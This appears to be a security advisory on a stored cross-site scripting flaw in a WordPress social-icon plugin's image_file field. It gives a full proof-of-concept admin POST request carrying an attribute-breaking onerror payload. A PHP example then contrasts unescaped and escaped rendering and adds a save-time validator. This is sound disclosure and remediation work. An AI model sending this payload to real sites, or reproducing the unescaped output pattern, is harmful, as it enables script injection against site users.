The plugin does not properly escape the image_file field when adding a new social icon, allowing high-privileged users to inject arbitrary JavaScript even when the unfiltered_html capability is disallowed. Version 3.2.0 addressed some of the issues, but was still vulnerable when clicking to edit the contaminated icon.
```
POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd
Accept-Encoding: gzip, deflate
Cookie: [Admin cookies]
Connection: close

------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wpnonce"

482d64ba75
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin.php?page=cnss_social_icon_add
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="title"

55
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="image_file"

." onerror=alert``;//
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="url"

1123
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="sortorder"

4
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="target"

1
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="action"

update
------WebKitFormBoundaryntci4RWsTIt6kFWd
Content-Disposition: form-data; name="submit_button"

변경사항 저장
------WebKitFormBoundaryntci4RWsTIt6kFWd--
```
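The flaw class described above, as an added example that is not the plugin's source: a stored image_file value written into quoted HTML attributes on an edit screen, first unescaped and then escaped, plus a save-time check. The function names, the assumed markup of the edit row and the benign sample URL are hypothetical; plain PHP's htmlspecialchars() is used so the block runs outside WordPress, where esc_attr() and esc_url() serve this purpose on output and esc_url_raw() on save.

```php
<?php
// Added illustration: hypothetical function names, not the plugin's source.

// Before: the stored value is concatenated straight into quoted attributes.
function render_edit_row_unescaped(string $imageFile): string
{
    return '<input name="image_file" value="' . $imageFile . '">'
         . '<img src="' . $imageFile . '" alt="">';
}

// After: encode for the HTML attribute context at output time.
function render_edit_row_escaped(string $imageFile): string
{
    $safe = htmlspecialchars($imageFile, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input name="image_file" value="' . $safe . '">'
         . '<img src="' . $safe . '" alt="">';
}

// Save-time validation: keep only http(s) URLs free of characters that
// can terminate an attribute or start markup; anything else becomes ''.
function sanitize_image_file(string $raw): string
{
    $raw = trim($raw);
    if ($raw === '' || preg_match('/["\'<>`\s]/', $raw)) {
        return '';
    }
    $scheme = parse_url($raw, PHP_URL_SCHEME);
    if (!is_string($scheme) || !in_array(strtolower($scheme), ['http', 'https'], true)) {
        return '';
    }
    return $raw;
}

// Inputs: the image_file value from the request above, and a constructed benign URL.
$samples = [
    '." onerror=alert``;//',
    'https://example.test/icons/rss.png',
];

foreach ($samples as $value) {
    echo "stored value : {$value}\n";
    echo "unescaped    : " . render_edit_row_unescaped($value) . "\n";
    echo "escaped      : " . render_edit_row_escaped($value) . "\n";
    echo "after save   : " . var_export(sanitize_image_file($value), true) . "\n\n";
}
```

Escaping at output is what closes the edit-screen case the advisory says remained after 3.2.0: values already stored before a save-time filter existed are still rendered, so validation on input alone does not cover them.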